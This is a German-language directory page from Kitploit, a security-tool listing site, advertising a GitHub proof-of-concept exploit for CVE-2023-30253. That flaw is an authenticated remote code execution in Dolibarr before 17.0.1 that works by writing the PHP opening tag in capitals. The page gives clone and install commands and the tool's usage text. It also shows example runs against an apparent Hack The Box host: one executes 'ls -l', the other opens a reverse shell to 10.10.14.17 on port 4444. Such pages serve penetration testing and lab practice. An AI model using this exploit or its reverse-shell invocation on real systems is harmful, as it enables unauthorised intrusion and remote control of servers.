Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2023-30253 — Dolibarr vor 17.0.1 ermöglicht einem authentifizierten Benutzer die Remote-Codeausführung durch eine Großschreibungsmanipulation: <?PHP statt <?php in injizierten Daten. | Kitploit
Tools/GitHubGitHub/rubikcuv5/cve-2023-30253
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubrubikcuv5/cve-2023-30253

cve-2023-30253

Dolibarr vor 17.0.1 ermöglicht einem authentifizierten Benutzer die Remote-Codeausführung durch eine Großschreibungsmanipulation: <?PHP statt <?php in injizierten Daten.

Repository anzeigen
7vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-30253

Bild

Beschreibung

Dolibarr vor Version 17.0.1 ermöglicht einem authentifizierten Benutzer eine Remotecodeausführung durch eine Großschreibungsmanipulation: <?PHP anstatt <?php in injizierten Daten.

Dokumentation

  • CVE-2023-30253
  • GitHub Advisory: GHSA-9wqr-5jp4-mjmh

Einrichtung

root@kitploit:~
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

VERWENDUNG

root@kitploit:~
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

BEISPIELE POC

Befehl ausführen

root@kitploit:~
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

Bild

Reverse Shell erhalten

root@kitploit:~
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

Bild

Autor

  • Rubickcuv
Tool herunterladen